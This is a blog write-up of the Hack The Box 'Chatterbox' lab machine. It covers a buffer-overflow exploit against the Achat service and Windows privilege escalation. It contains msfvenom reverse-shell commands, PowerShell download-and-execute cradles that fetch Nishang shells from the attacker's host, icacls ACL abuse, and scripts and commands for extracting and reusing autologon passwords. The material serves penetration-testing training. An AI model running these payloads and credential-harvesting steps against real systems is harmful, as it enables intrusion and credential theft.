Hack The Box — Chatterbox

Chatterbox is a Medium-difficulty Windows machine on Hack The Box and part of TJ Null's OSCP prep list. It is a buffer overflow box: we run a public exploit against the Achat service to get a shell, then abuse file permissions with icacls to read the root flag. I will be covering both ways to solve this machine.

NOTE: This box is highly unstable and the only open ports are 9255 and 9256. So first run nmap against just those two ports and check that the Achat service is running, rather than doing a full port scan (-p-). If the Achat service is not running, restart the machine. Users have often reported losing their shells as well.

ENUMERATION

The only open ports are 9255 and 9256, which run an unusual service called Achat. A quick search tells us it is vulnerable to a buffer overflow.

We use searchsploit to look for exploits for the Achat service, find one, and mirror it to the current directory with -m; it is saved as 36025.py by default.

If we open the exploit code, we see a commented-out msfvenom command which the author helpfully left for generating the shellcode.

However, we have to make some changes to that command. By default it uses a windows/exec payload that runs calc.exe on the target. We will use a windows/shell_reverse_tcp payload (-p) instead, drop the CMD=calc.exe option since we are no longer executing a program, and add LHOST and LPORT for our listener.

THIS IS WHAT OUR FINAL MSFVENOM COMMAND SHOULD LOOK LIKE-

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.22 LPORT=7777 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

Copy the generated shellcode and replace the default buf variable in the script with it.

NOTE: If we scroll down in the script, we see that there is a maximum length limit of 1152 bytes on the payload (refer to the image below). Anything that exceeds that will probably not work, so we keep it in mind when using msfvenom to generate our reverse shell. Luckily the msfvenom command above produced a shellcode of around 774 bytes, so it is within the limit.

We also have to change the default IP and port in the script to those of the target, i.e. the Chatterbox IP and the Achat port (9256).

Now start a netcat listener on port 7777 and finally run the exploit with python 36025.py.

AND WE HAVE A SHELL !!!

READING ROOT.txt

We can now run commands like whoami /priv and systeminfo to find out more about our target. We can also run enumeration scripts like PowerUp.ps1 or winPEAS.

Potato attacks won't work here: whoami /priv shows that SeImpersonatePrivilege is not enabled, so we can't use Juicy Potato to escalate privileges.

In the systeminfo output, look at the Hotfix(s) section, which lists the installed patches. There are a lot of patches on this system, so a kernel exploit is unlikely to work; otherwise we could have found one by searching for the OS build number. Anyway, let's look at the directories...

We find root.txt in C:\Users\Administrator\Desktop, but we are unable to read it. The odd part is that we can enter the Administrator directory at all: normally a low-privileged user gets access denied on another user's profile (if you have solved other boxes on HTB, you will know this).

Let's see what permissions exist on root.txt. We can use icacls to view them, and we see that Administrator has (F) Full control on root.txt.

(Don't forget that we are not Administrator; we are currently a normal user called Alfred.)

Let's also run icacls on the current directory. Since we were able to enter it as the regular user Alfred, we must have some access to it, and indeed Alfred has (F) Full control on the Desktop directory. The (OI) and (CI) flags on that entry only mean the entry is inherited by files and subfolders created under it; they say nothing about ownership. Ownership is what lets Alfred change the ACL of root.txt even though his name is not in its ACL: icacls does not show the owner, but dir /q or Get-Acl root.txt does, and it shows Alfred as the owner of the file. For more detail, refer to a guide on icacls.

If we google how to grant a user permissions with icacls, we find the answer on Stack Overflow (the /grant switch):

So let's grant ourselves (Alfred) access using icacls with the /grant switch, and finally we are able to read the root flag.
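As an added example (not from the original writeup), here is a small Python parser for the output that icacls prints, the format used on both root.txt and the Desktop directory above. It separates the inheritance flags ((OI), (CI), (I) and so on) from the rights and reports which principals hold Full control, which makes it obvious that (OI)(CI) on Alfred's Desktop entry describes propagation, not ownership. The two icacls listings embedded in the script are constructed samples in the shape of the ones seen on the box, not a verbatim capture, and the principal names in them are assumptions.

```python
"""Parse icacls output and report who holds Full control.

Added example: not part of the original writeup. The two listings below are
constructed in the shape of the icacls output seen on the box, not captures.
"""
import re

# Tokens icacls prints ahead of the rights: inheritance and propagation only
INHERIT = {
    "OI": "object inherit: files created in this directory get the entry",
    "CI": "container inherit: subdirectories get the entry",
    "IO": "inherit only: entry does not apply to this object itself",
    "NP": "do not propagate further than one level",
    "I": "entry was inherited from the parent",
}

_ACE = re.compile(r"^(?P<who>[^:]+?):(?P<tokens>(?:\([^)]*\))+)$")

# Constructed sample for `icacls .` run in C:\Users\Administrator\Desktop
DESKTOP_ACL = r"""
. CHATTERBOX\Alfred:(OI)(CI)(F)
  NT AUTHORITY\SYSTEM:(OI)(CI)(F)
  BUILTIN\Administrators:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed sample for `icacls root.txt` in the same directory
ROOT_TXT_ACL = r"""
root.txt CHATTERBOX\Administrator:(F)

Successfully processed 1 files; Failed processing 0 files
"""


def parse_icacls(output: str, path: str):
    """Return [(principal, inherit_flags, rights, deny)] for `icacls <path>` output.

    The first line starts with the path as it was passed to icacls; it is
    stripped so principals containing spaces (NT AUTHORITY\\SYSTEM) stay intact.
    """
    aces = []
    for raw in output.splitlines():
        line = raw.rstrip()
        if not line or line.startswith("Successfully processed"):
            continue
        if not raw[:1].isspace():  # first line: "<path> <principal>:<tokens>"
            if line.startswith(path + " "):
                line = line[len(path) + 1:]
            elif " " in line:
                line = line.split(" ", 1)[1]
        m = _ACE.match(line.strip())
        if not m:
            continue
        tokens = re.findall(r"\(([^)]*)\)", m.group("tokens"))
        deny = "DENY" in tokens
        flags = tuple(t for t in tokens if t in INHERIT)
        rights = tuple(t for t in tokens if t not in INHERIT and t != "DENY")
        aces.append((m.group("who"), flags, rights, deny))
    return aces


def full_control(aces):
    """Principals with an allow entry carrying (F), and where that entry propagates.

    Ownership is deliberately absent: icacls never prints it, yet the owner can
    rewrite the DACL regardless of what is listed here.
    """
    result = {}
    for who, flags, rights, deny in aces:
        if deny or "F" not in rights:
            continue
        result[who] = {"to_files": "OI" in flags, "to_subdirs": "CI" in flags}
    return result


def explain(ace):
    """Human-readable line for one parsed entry."""
    who, flags, rights, deny = ace
    kind = "DENY" if deny else "ALLOW"
    inh = "; ".join(INHERIT[f] for f in flags) or "applies to this object only"
    return f"{kind} {who}: {','.join(rights)} ({inh})"


if __name__ == "__main__":
    for ace in parse_icacls(DESKTOP_ACL, "."):
        print(explain(ace))
    print("Full control on root.txt:", full_control(parse_icacls(ROOT_TXT_ACL, "root.txt")))
```

icacls never prints the owner; to confirm that the owner (who can always rewrite the DACL) is Alfred, use dir /q root.txt or (Get-Acl root.txt).Owner on the target. The grant itself is then a one-liner of the form icacls root.txt /grant Alfred:F, which is the /grant syntax from the icacls documentation rather than a command copied from the page.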

ALTERNATE METHOD- POWERSHELL

We can also try the windows/powershell_reverse_tcp payload (-p) instead of the windows/shell_reverse_tcp used earlier:

This part of the writeup has been taken from Rana Khalil's writeup as part of my note-keeping. Since I was unable to access the box after it crashed, I was unable to cover it in the writeup myself.

(Link to Rana Khalil's writeup: https://ranakhalil101.medium.com/hack-the-box-chatterbox-writeup-w-o-metasploit-c8421ac09318)

COMMAND

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=10.10.14.22 LPORT=6666 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

HOWEVER, WE SEE THAT THE PAYLOAD SIZE EXCEEDS THE LIMIT MENTIONED IN THE EXPLOIT!

The payload is 3626 bytes, well over the 1152-byte maximum.

So instead, we’ll just use the windows/exec module to download and execute the Nishang reverse shell.

Download the Nishang repository and copy the Invoke-PowerShellTcp.ps1 script into your current directory.

cp ../../tools/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell.ps1

Add the following line to the end of the script with the attack machine configuration settings.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.7 -Port 1234

When called, this sends a reverse shell back to our attack machine on port 1234.

Setup a listener to receive the reverse shell.

nc -nlvp 1234

Next, use msfvenom to generate a payload that downloads the PowerShell script and executes it.

msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.7:5555/shell.ps1')" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

We get back the following result.

Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 684 (iteration=0)
x86/unicode_mixed chosen with final size 684
Payload size: 684 bytes
Final size of python file: 3330 bytes
buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
.....[redacted]

Good! The payload size is 684 bytes, so it’s within the limit. Copy the payload and add it in place of the payload included in the exploit.
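Both payloads on this page (the roughly 774-byte shell_reverse_tcp in the first method and the 684-byte windows/exec cradle here) had to be checked against the same two constraints before being pasted into 36025.py: the 1152-byte limit and the bad-character list handed to msfvenom. The following script is an added example, not part of the original writeup or of the exploit. It parses msfvenom's -f python output and rejects a buffer that is too long or contains a forbidden byte; the constructed sample reuses only the first four buf lines shown above, so it is 52 bytes rather than 684. The 1152 limit and the bad-character list are taken from the page; the function names are mine.

```python
"""Check an msfvenom '-f python' buffer against the limits 36025.py imposes.

Added example: not part of the original writeup or of the Achat exploit.
"""
import ast
import re
import sys

MAX_PAYLOAD = 1152  # limit the exploit script enforces on the shellcode
# Bytes passed to msfvenom -b: NUL plus everything >= 0x80. The exploit uses
# the unicode_mixed encoder because the input goes through a unicode
# conversion on the target, so only 0x01-0x7f can be relied on.
BADCHARS = bytes([0x00]) + bytes(range(0x80, 0x100))

# Matches `buf = b""` and `buf += b"\x50\x50..."` (python2 output has no b prefix)
_BUF_LINE = re.compile(r'^\s*buf\s*\+?=\s*(b?"(?:[^"\\]|\\.)*")\s*$')

# Constructed sample: the first four buf lines shown above (52 of the 684 bytes)
SAMPLE_OUTPUT = r'''
Payload size: 684 bytes
buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
'''


def parse_msfvenom_python(text: str) -> bytes:
    """Reassemble the shellcode from msfvenom's buf lines, ignoring other output."""
    out = bytearray()
    for line in text.splitlines():
        m = _BUF_LINE.match(line)
        if not m:
            continue  # 'Payload size: ...' and encoder chatter
        literal = m.group(1)
        if not literal.startswith("b"):
            literal = "b" + literal
        out += ast.literal_eval(literal)  # only ever a bytes literal
    return bytes(out)


def check_payload(buf: bytes, max_len: int = MAX_PAYLOAD, badchars: bytes = BADCHARS):
    """Return (ok, problems): too long, or containing a byte the target mangles."""
    problems = []
    if len(buf) > max_len:
        problems.append(f"payload is {len(buf)} bytes, limit is {max_len}")
    hits = sorted({b for b in buf if b in badchars})
    if hits:
        problems.append("bad characters present: " + ", ".join(f"0x{b:02x}" for b in hits))
    return (not problems, problems)


if __name__ == "__main__":
    # Pipe the msfvenom output in, or run without input to check the sample
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_OUTPUT
    ok, problems = check_payload(parse_msfvenom_python(text))
    print("OK to paste into 36025.py" if ok else "\n".join(problems))
```

Run it as msfvenom ... -f python | python3 check_payload.py; the 3626-byte powershell_reverse_tcp output from the previous attempt fails the length check the same way the exploit would have rejected it.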

Start up a Python web server in the directory that the PowerShell script resides in (on Python 3 the equivalent is python3 -m http.server 5555).

python -m SimpleHTTPServer 5555

Run the exploit.

root@kali:~/Desktop/htb/chatterbox# python 36025.py 
---->{P00F}!

We get a PowerShell shell!

We’ll use the PowerUp.ps1 script to determine if there are any misconfigurations that lead to privilege escalation.

Upload and run the script on the target machine.

PS C:\Users\Alfred\Desktop> iex(new-object net.webclient).downloadstring('http://10.10.14.7:5555/PowerUp.ps1')
PS C:\Users\Alfred\Desktop> Invoke-AllChecks

We get back two interesting results.

[*] Checking for Autologon credentials in registry...

DefaultDomainName    :
DefaultUserName      : Alfred
DefaultPassword      : Welcome1!
AltDefaultDomainName :
AltDefaultUserName   :
AltDefaultPassword   :

[*] Checking for unattended install files...

UnattendPath : C:\Windows\Panther\Unattend.xml

Viewing the Unattend.xml file, we see that the password has been redacted, so let's focus on the Autologon credentials. The default username is "Alfred" and the default password is "Welcome1!". I don't have much experience with Windows, so I googled Autologon credentials to learn more about them.

As stated in the article, these credentials are stored in the registry in plain text. The manual commands for extracting them are:

PS C:\Windows\system32> (Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -ErrorAction SilentlyContinue).DefaultUserName
Alfred
PS C:\Windows\system32> (Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -ErrorAction SilentlyContinue).DefaultPassword
Welcome1!
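Added example, not part of either writeup: a Python helper that pulls autologon credentials from the two places PowerUp checked above, C:\Windows\Panther\Unattend.xml and the Winlogon registry values. The Unattend.xml documents it builds are constructed (minimal files in the unattend namespace; the first carries the *SENSITIVE*DATA*DELETED* marker Windows writes when it scrubs the password, the second a non-plaintext value, which Windows stores as base64 of the UTF-16LE password with the literal word Password appended). The Winlogon values are passed in as a plain dictionary, i.e. the properties Get-ItemProperty returned above, so that the script runs offline on copied data; the credential values used are the ones from the page.

```python
"""Recover Windows autologon credentials from Unattend.xml and Winlogon values.

Added example: not part of either writeup. The XML documents and the Winlogon
dictionary below are constructed; the credential values are the page's.
"""
import base64
import binascii
import xml.etree.ElementTree as ET

UNATTEND_NS = "urn:schemas-microsoft-com:unattend"
NS = {"u": UNATTEND_NS}
# Marker Windows leaves in C:\Windows\Panther\Unattend.xml once it scrubs a password
REDACTED = "*SENSITIVE*DATA*DELETED*"


def _unattend_doc(value: str, plain: bool) -> str:
    """Build a minimal Unattend.xml with one AutoLogon block (constructed sample)."""
    plain_text = "true" if plain else "false"
    return f"""<unattend xmlns="{UNATTEND_NS}">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password>
          <Value>{value}</Value>
          <PlainText>{plain_text}</PlainText>
        </Password>
        <Enabled>true</Enabled>
        <Username>Alfred</Username>
      </AutoLogon>
    </component>
  </settings>
</unattend>"""


def encode_unattend_password(password: str) -> str:
    """Non-plaintext values are base64(UTF-16LE(password + "Password"))."""
    return base64.b64encode((password + "Password").encode("utf-16-le")).decode("ascii")


def _decode(value: str, plain: bool) -> str:
    if plain:
        return value
    try:
        text = base64.b64decode(value, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return value  # not encoded the documented way; hand it back as-is
    return text[: -len("Password")] if text.endswith("Password") else text


def creds_from_unattend(xml_text: str):
    """Return [(username, password)] per AutoLogon block; password is None when redacted."""
    found = []
    for auto in ET.fromstring(xml_text).iter(f"{{{UNATTEND_NS}}}AutoLogon"):
        user = auto.findtext("u:Username", default="", namespaces=NS)
        pw_el = auto.find("u:Password", namespaces=NS)
        if pw_el is None:
            continue
        value = pw_el.findtext("u:Value", default="", namespaces=NS)
        # A missing PlainText element is treated as encoded (assumption; the
        # decoder falls back to the raw value if that turns out to be wrong)
        plain = pw_el.findtext("u:PlainText", default="false", namespaces=NS).strip().lower() == "true"
        found.append((user, None if value == REDACTED else _decode(value, plain)))
    return found


def winlogon_autologon(values: dict):
    """Interpret the Winlogon key's properties (as Get-ItemProperty returns them)."""
    user = values.get("DefaultUserName") or ""
    password = values.get("DefaultPassword") or ""
    if not (user and password):
        return None
    return {
        "user": user,
        "password": password,
        "domain": values.get("DefaultDomainName") or "",
        "autologon_enabled": str(values.get("AutoAdminLogon", "0")) == "1",
    }


# Constructed samples: what the box showed (scrubbed) and what an un-scrubbed file looks like
UNATTEND_REDACTED = _unattend_doc(REDACTED, plain=True)
UNATTEND_ENCODED = _unattend_doc(encode_unattend_password("Welcome1!"), plain=False)
WINLOGON_SAMPLE = {"DefaultDomainName": "", "DefaultUserName": "Alfred",
                   "DefaultPassword": "Welcome1!", "AutoAdminLogon": "1"}

if __name__ == "__main__":
    print("Unattend.xml (scrubbed):", creds_from_unattend(UNATTEND_REDACTED))
    print("Unattend.xml (encoded): ", creds_from_unattend(UNATTEND_ENCODED))
    print("Winlogon:", winlogon_autologon(WINLOGON_SAMPLE))
```

On a real target, feed creds_from_unattend the contents of C:\Windows\Panther\Unattend.xml (and the Unattend.xml or sysprep.xml copies elsewhere under C:\Windows) and winlogon_autologon the output of Get-ItemProperty on the Winlogon key; the AutoAdminLogon flag tells you whether the stored password is actually in use at logon, but the DefaultPassword value is worth trying either way.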

These credentials are set by the administrator. Since users have a tendency to reuse passwords, let’s see if the administrator account is set to the same password.

To do that, first run the following command to convert the plain text string “Welcome1!” into a secure string and store the result in the $password variable.

$password = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
  • ConvertTo-SecureString: Converts plain text to secure strings.
  • -AsPlainText: Specifies a plain text string to convert to a secure string.
  • -Force: Confirms that you understand the implications of using the AsPlainText parameter and still want to use it.

Second, create a new object to store these credentials.

$cred = New-Object System.Management.Automation.PSCredential('Administrator', $password)

Third, we’ll use these credentials to start PowerShell and send a (hopefully privileged) reverse shell back to our attack machine.

In the attack machine, copy the shell.ps1 script we used earlier and save it in the file shell-admin.ps1.

cp shell.ps1 shell-admin.ps1

Change shell-admin.ps1 to send a reverse shell to our attack machine on port 6666.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.7 -Port 6666

Setup a python server in the directory that the script resides in.

python -m SimpleHTTPServer 5555

Setup a listener to receive the reverse shell.

nc -nlvp 6666

On the target machine, use the credentials to start PowerShell to download the shell-admin.ps1 script, run it and send a reverse shell back to our attack machine.

Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7:5555/shell-admin.ps1')" -Credential $cred

We get a shell with administrator privileges!

Now we can view the root.txt flag without having to change the ACL permissions on it.

CONCLUSION

In this box we learnt that -

  • We can run a buffer overflow exploit against a vulnerable service after making certain changes to the exploit. However, we need to make sure that the shellcode we generate with msfvenom is within the maximum length limit.
  • There are multiple payloads which can be used with msfvenom, like:

windows/shell_reverse_tcp OR windows/powershell_reverse_tcp OR

windows/exec CMD="powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.22:8000/Invoke-PowerShellTcp.ps1')" ~make changes accordingly

  • We can use icacls to view or grant file permissions to users
  • We can abuse the Windows Autologon feature to read credentials in plain text, and sometimes reuse them to log in as Administrator, since admins often reuse user passwords.

I hope you find this writeup helpful, and make sure to follow me here on Medium for more CTF writeups.

--

ZeusCybersec

I am a Penetration Tester, currently pursuing OSCP. Skilled in network pen-testing and developing hacking tools using Python. I share my knowledge on YouTube.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

USDT Savings Round 12 is Open

89/365 — Another sunrise

HOW TO CHOOSE THE RIGHT STATIC BIKE TO HELP YOU EXERCISE

Why only simplefied Chinese?

BRIDGE

Welcome Home

Water Development Board Jobs 2022

My first published content!

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ZeusCybersec

ZeusCybersec

I am a Penetration Tester, Currently pursuing OSCP. Skilled in Network Pen-testing and Developing Hacking Tools using Python.I Share my Knowledge on YouTube

More from Medium

Hack The Box — Devel

TryHackme: Overpass by NinjaJc01

HTB Write-up Jeeves (Windows) File Transferring with SMB file share(impacket tool), Poweshell &…

TryHackMe — Year of the Rabbit Write-Up